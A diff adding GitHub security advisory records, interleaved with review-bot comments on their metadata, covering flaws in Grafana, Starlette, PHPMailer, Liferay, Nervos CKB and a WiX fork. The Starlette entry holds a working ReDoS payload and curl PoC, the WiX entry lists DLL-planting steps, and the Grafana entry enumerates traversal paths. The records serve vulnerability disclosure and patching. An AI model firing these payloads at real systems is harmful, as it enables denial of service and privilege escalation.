+++ b/advisories/github-reviewed/2024/02/GHSA-84x2-2qv6-qg56/GHSA-84x2-2qv6-qg56.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-84x2-2qv6-qg56", + "modified": "2024-02-02T22:21:27Z", + "published": "2024-02-02T22:21:27Z", + "aliases": [ + + ], + "summary": "Nervos CKB P2P DoS Attacks", + "details": "The P2P protocols lack of rate limit. For example, in relay protocol, when a node receives a broadcasted `tx_hashes`, it will mark it in memory to avoid duplicated requests. [code → ](https://github.com/nervosnetwork/ckb/blob/26e4837212c392c3c706a0da7a056131fb060433/sync/src/relayer/transactions_process.rs#L67).\n\nIt is easy to establish a DoS attach by generating random tx hashes.\n\n### Impact\n\nIt affects all nodes connected to the P2P network.\n\n### Workarounds\n\nApply rate limit on the data sent to CKB P2P port.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.34.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-84x2-2qv6-qg56" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/c5eb5478b635cea2ccef8676cf97692cd38293c3" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T22:21:27Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-87m3-6qj3-p3xh/GHSA-87m3-6qj3-p3xh.json b/advisories/github-reviewed/2024/02/GHSA-87m3-6qj3-p3xh/GHSA-87m3-6qj3-p3xh.json new file mode 100644 index 0000000000000..7e4f6fa679c5d --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-87m3-6qj3-p3xh/GHSA-87m3-6qj3-p3xh.json 
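Review bot: `severity` is an empty array while `database_specific.severity` is `CRITICAL`, so the record carries the highest label with no CVSS vector behind it; the details describe an unauthenticated network DoS via random `tx_hashes`, which under CVSS 3.1 normally scores `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` (7.5, High), so either add that vector or explain in `details` why it rates higher. `cwe_ids` is likewise empty; `"cwe_ids": ["CWE-770"]` (allocation of resources without limits or throttling) matches the "lack of rate limit" description. The fix is recorded as `0.34.0` but the advisory is published in 2024, so a sentence noting when the fix shipped would help readers judge their exposure window.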
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87m3-6qj3-p3xh", + "modified": "2024-02-07T19:32:22Z", + "published": "2024-02-07T15:30:50Z", + "aliases": [ + "CVE-2024-25143" + ], + "summary": "Liferay Portal denial of service (memory consumption)", + "details": "The Document and Media widget In Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.3.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25143" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/29b73b9b896c7d44fb5d1800a402698c303d1cf6" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/4381c10ad0722b3b00c3e3567b68538ab0994145" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/releases/tag/7.3.7-ga8" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25143" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T19:32:22Z", + "nvd_published_at": "2024-02-07T15:15:08Z" + } +} \ No newline at end of file 
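Review bot: The `introduced: 7.2.0` event contradicts the details, which say 7.2.0 through 7.3.6 *and older unsupported versions* are affected; with this range a project on 7.1.x or 7.0.x is reported clean. Unless there is evidence the preview-generation path did not exist before 7.2.0, `"introduced": "0"` is the safer boundary for the `release.portal.bom` coordinate. The DXP service-pack and fix-pack versions named in the text cannot be expressed against this Maven artifact, which is fine, but saying so in `details` would stop DXP users assuming the range covers them.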
diff --git a/advisories/github-reviewed/2024/02/GHSA-8jc3-5p29-qgjx/GHSA-8jc3-5p29-qgjx.json b/advisories/github-reviewed/2024/02/GHSA-8jc3-5p29-qgjx/GHSA-8jc3-5p29-qgjx.json new file mode 100644 index 0000000000000..c315c0d36e61b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-8jc3-5p29-qgjx/GHSA-8jc3-5p29-qgjx.json 
@@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jc3-5p29-qgjx", + "modified": "2024-02-02T20:43:57Z", + "published": "2024-02-02T20:43:57Z", + "aliases": [ + "CVE-2006-5734" + ], + "summary": "PHPMailer Local file inclusion", + "details": "### Impact\nArbitrary local file inclusion via the `$lang` property, remotely exploitable if host application passes unfiltered user data into that property. The 3 CVEs listed are applications that used PHPMailer that were vulnerable to this problem.\n\n### Patches\nIt's not known exactly when this was fixed in the host applications, but it was fixed in PHPMailer 5.2.0.\n\n### Workarounds\nFilter and validate user-supplied data before use.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2006-5734\nhttps://nvd.nist.gov/vuln/detail/CVE-2007-3215\nhttps://nvd.nist.gov/vuln/detail/CVE-2007-2021\nExample exploit: https://www.exploit-db.com/exploits/14893\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmailer/phpmailer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-8jc3-5p29-qgjx" + }, + { + "type": "PACKAGE", + "url": "https://github.com/PHPMailer/PHPMailer" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:43:57Z", + "nvd_published_at": null + } +} \ No newline at end of file 
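Review bot: `cwe_ids` is empty although the details describe arbitrary local file inclusion through the `$lang` property; `"cwe_ids": ["CWE-98"]` (PHP file inclusion) is the usual classification, with CWE-22 as the alternative if the maintainers consider it plain path traversal. CVE-2007-3215 and CVE-2007-2021 are cited in `details` as the host-application CVEs but are absent from `aliases` — correctly, since they are not the same issue — and OSV has a `related` array for exactly this, e.g. `"related": ["CVE-2007-3215", "CVE-2007-2021"]`. `severity` is also empty, so consumers see a MODERATE label with no vector to support it.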
diff --git a/advisories/github-reviewed/2024/02/GHSA-8pjx-jj86-j47p/GHSA-8pjx-jj86-j47p.json b/advisories/github-reviewed/2024/02/GHSA-8pjx-jj86-j47p/GHSA-8pjx-jj86-j47p.json new file mode 100644 index 0000000000000..a70a562391942 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-8pjx-jj86-j47p/GHSA-8pjx-jj86-j47p.json 
@@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8pjx-jj86-j47p", + "modified": "2024-02-01T00:16:10Z", + "published": "2024-02-01T00:16:10Z", + "aliases": [ + "CVE-2021-43798" + ], + "summary": "Grafana path traversal", + "details": "Today we are releasing Grafana 8.3.1, 8.2.7, 8.1.8, 8.0.7. This patch release includes a high severity security fix that affects Grafana versions from v8.0.0-beta1 through v8.3.0.\n\nRelease v8.3.1, only containing a security fix:\n\n- [Download Grafana 8.3.1](https://grafana.com/grafana/download/8.3.1)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-3-1/)\n\nRelease v8.2.7, only containing a security fix:\n\n- [Download Grafana 8.2.7](https://grafana.com/grafana/download/8.2.7)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-2-7/)\n\nRelease v8.1.8, only containing a security fix:\n\n- [Download Grafana 8.1.8](https://grafana.com/grafana/download/8.1.8)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-8/)\n\nRelease v8.0.7, only containing a security fix:\n\n- [Download Grafana 8.0.7](https://grafana.com/grafana/download/8.0.7)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-0-7/)\n\n\n## Path Traversal ([CVE-2021-43798](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43798))\n\n### Summary \n\nOn 2021-12-03, we received a report that Grafana is vulnerable to directory traversal, allowing access to local files. We have confirmed this for versions 8.0.0-beta1 to 8.3.0. 
Thanks to our defense-in-depth approach, at no time has [Grafana Cloud](https://grafana.com/cloud) been vulnerable.\n\nThe vulnerable URL path is: /public/plugins//, where is the plugin ID for any installed plugin.\n\nEvery Grafana instance comes with pre-installed plugins like the Prometheus plugin or MySQL plugin so the following URLs are vulnerable for every instance:\n\n* /public/plugins/alertlist/\n* /public/plugins/annolist/\n* /public/plugins/barchart/\n* /public/plugins/bargauge/\n* /public/plugins/candlestick/\n* /public/plugins/cloudwatch/\n* /public/plugins/dashlist/\n* /public/plugins/elasticsearch/\n* /public/plugins/gauge/\n* /public/plugins/geomap/\n* /public/plugins/gettingstarted/\n* /public/plugins/grafana-azure-monitor-datasource/\n* /public/plugins/graph/\n* /public/plugins/heatmap/\n* /public/plugins/histogram/\n* /public/plugins/influxdb/\n* /public/plugins/jaeger/\n* /public/plugins/logs/\n* /public/plugins/loki/\n* /public/plugins/mssql/\n* /public/plugins/mysql/\n* /public/plugins/news/\n* /public/plugins/nodeGraph/\n* /public/plugins/opentsdb\n* /public/plugins/piechart/\n* /public/plugins/pluginlist/\n* /public/plugins/postgres/\n* /public/plugins/prometheus/\n* /public/plugins/stackdriver/\n* /public/plugins/stat/\n* /public/plugins/state-timeline/\n* /public/plugins/status-history/\n* /public/plugins/table/\n* /public/plugins/table-old/\n* /public/plugins/tempo/\n* /public/plugins/testdata/\n* /public/plugins/text/\n* /public/plugins/timeseries/\n* /public/plugins/welcome/\n* /public/plugins/zipkin/\n\nWe have received CVE-2021-43798 for this issue. 
The CVSS score for this vulnerability is 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) for Grafana versions 8.0.0-beta1 to 8.3.0 \n\n### Affected versions with high severity \n\nGrafana 8.0.0-beta1 to 8.3.0\n\n### Solutions and mitigations\n\nAll installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible.\n\nIf you can not upgrade, running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability. For example the normalize_path setting in envoy.\n\nThanks to our defense-in-depth approach, [Grafana Cloud](https://grafana.com/cloud) instances have not been affected by the vulnerability.\n\nAs always, we closely coordinated with all cloud providers licensed to offer Grafana Pro. They have received early notification under embargo and confirmed that their offerings are secure at the time of this announcement. In alphabetical order, this is applicable to Amazon Managed Grafana, and Azure Managed Grafana.\n\n### Timeline and postmortem\n\nHere is a detailed timeline starting from when we originally learned of the issue. 
All times in UTC.\n\n* 2021-12-03: Security researcher sends the initial report\n* 2021-12-03: Confirmed for 8.0.0-beta1 through 8.3.0\n* 2021-12-03: Confirmed that Grafana Cloud is not vulnerable\n* 2021-12-03: Security fix determined and committed to Git\n* 2021-12-03: Release timeline determined: 2021-12-07 for private customer release, 2021-12-14 for public release\n* 2021-12-06: Second report about the vulnerability received\n* 2021-12-07: We received information that the vulnerability has been leaked to the public, turning it into a 0 day\n* 2021-12-07: Decision made to release as quickly as feasible\n* 2021-12-07: Private release with reduced two hour grace period instead of the usual 1 week\n* 2021-12-07: Public release\n\n### Acknowledgements\n\nWe would like to thank [Jordy Versmissen](https://twitter.com/j0v0x0) for finding the vulnerability and alerting us to it.\n\n## Reporting security Issues\n\nIf you think you have found a security vulnerability, please send a report to [security@grafana.com](mailto:security@grafana.com). This address can be used for all of\nGrafana Labs' open source and commercial products (including but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is\n\nF988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA\n\nThe key is available from [keyserver.ubuntu.com](https://keyserver.ubuntu.com/pks/lookup?search=0xF9887BEA027A049FAE8E5CAAD1258932BE24C5CA&fingerprint=on&op=index).\n\n## Security announcements\n\nWe maintain a [security category on our blog](https://grafana.com/tags/security/), where we will always post a summary, remediation, and mitigation details for any patch containing security fixes. 
\n\nYou can also subscribe to our [RSS feed](https://grafana.com/tags/security/index.xml).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.3.0" + }, + { + "fixed": "8.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.2.0" + }, + { + "fixed": "8.2.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.1.0" + }, + { + "fixed": "8.1.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0-beta1" + }, + { + "fixed": "8.0.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43798" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce" + }, + { + "type": "WEB", + "url": "https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20211229-0004/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.html" + }, + { + "type": "WEB", + "url": 
"http://www.openwall.com/lists/oss-security/2021/12/09/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2021/12/10/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T00:16:10Z", + "nvd_published_at": "2021-12-07T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-8v28-3g86-chj5/GHSA-8v28-3g86-chj5.json b/advisories/github-reviewed/2024/02/GHSA-8v28-3g86-chj5/GHSA-8v28-3g86-chj5.json new file mode 100644 index 0000000000000..8703d027055e8 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-8v28-3g86-chj5/GHSA-8v28-3g86-chj5.json 
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8v28-3g86-chj5", + "modified": "2024-02-08T18:24:35Z", + "published": "2024-02-08T18:24:35Z", + "aliases": [ + + ], + "summary": "PanelSwWix4.Sdk .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", + "details": "# Summary\n\n.be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges.\n\n# Details\n\nIf the bundle is not run as admin, the user's TEMP folder is used and not the system TEMP folder. A utility is able to monitor the user's TEMP folder for changes and drop its own DLL into the .be/.Local folder immediately when the .be folder is created. When the burn engine elevates, the malicious DLL receives elevated privileges.\n\n# PoC\n\nAs a standard, non-admin user:\n\n1. Monitor the user's TEMP folder for changes using ReadDirectoryChangesW\n1. On FILE_ACTION_ADDED, check if the folder name is .be\n1. Create a folder in .be named after the bundle + .Local (e.g. MyInstaller.exe.Local)\n1. Put the malicious COMCTL32.DLL in the .Local folder following the naming used for the real DLL (e.g. MyInstaller.exe.Local/x86_microsoft.windows.common-controls_.../COMCTL32.dll)\n1. Do hacker things when the engine escalates and the malicious DLL is loaded\n\nProper naming for the path can be obtained by using GetModuleHandle(\"comctl32.dll\") and GetModuleFileName.\n\n# Impact\n\nDLL redirection utilizing .exe.Local Windows capability. 
This impacts any installer built with the WiX installer framework.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "PanelSwWix4.Sdk" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.0.0-psw-wix.0251-40" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nirbar/wix4/security/advisories/GHSA-8v28-3g86-chj5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nirbar/wix4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:24:35Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json b/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json new file mode 100644 index 0000000000000..75f0f722cf2c1 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json 
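Review bot: `aliases` is empty even though the details repeat the upstream WiX advisory text and the Impact line says it "impacts any installer built with the WiX installer framework", which upstream is tracked as CVE-2024-24810 / GHSA-7wh2-wxc7-9ph5; if this package is a fork carrying the same Burn engine, a `"related": ["CVE-2024-24810", "GHSA-7wh2-wxc7-9ph5"]` entry (not `aliases`, since it is a different package) would let consumers correlate the two records. As with the upstream record, `fixed: 5.0.0-psw-wix.0251-40` patches the SDK and not bundles already built with it, so a sentence saying installers must be rebuilt would make the record actionable. The fixed version is a pre-release string; confirm NuGet's semver ordering places `5.0.0-psw-wix.0251-40` below whatever stable release the maintainers intend to ship next, otherwise that release will be reported as affected.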
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-93gm-qmq6-w238", + "modified": "2024-02-05T17:01:19Z", + "published": "2024-02-05T17:01:19Z", + "aliases": [ + + ], + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app that uses form data. 
To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep 
uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.36.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json b/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json new file mode 100644 index 0000000000000..2cedc2ef6f8d5 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json 
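Review bot: The root cause described in `details` is the `Content-Type` option regex in `python-multipart` (the reference points at `multipart/multipart.py#L72-L74`), yet the only `affected` entry is `starlette` `< 0.36.2`; anyone calling `python-multipart` directly, or through another framework, gets no match from this record. The advisory should say what `0.36.2` actually changes (a workaround inside Starlette versus an upstream fix it picks up) and either list a `python-multipart` range or point at that package's own advisory; the Impact paragraph already concedes FastAPI is affected transitively, which is the same gap. `aliases` is empty, so consumers keyed on CVE identifiers will not see this until one is assigned. The PoC's `kill -9` recovery note is a useful operational hint but does not replace a statement of which deployments (only those that call `request.form()`) are exposed — that sentence exists in the Summary and should be repeated in Impact.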
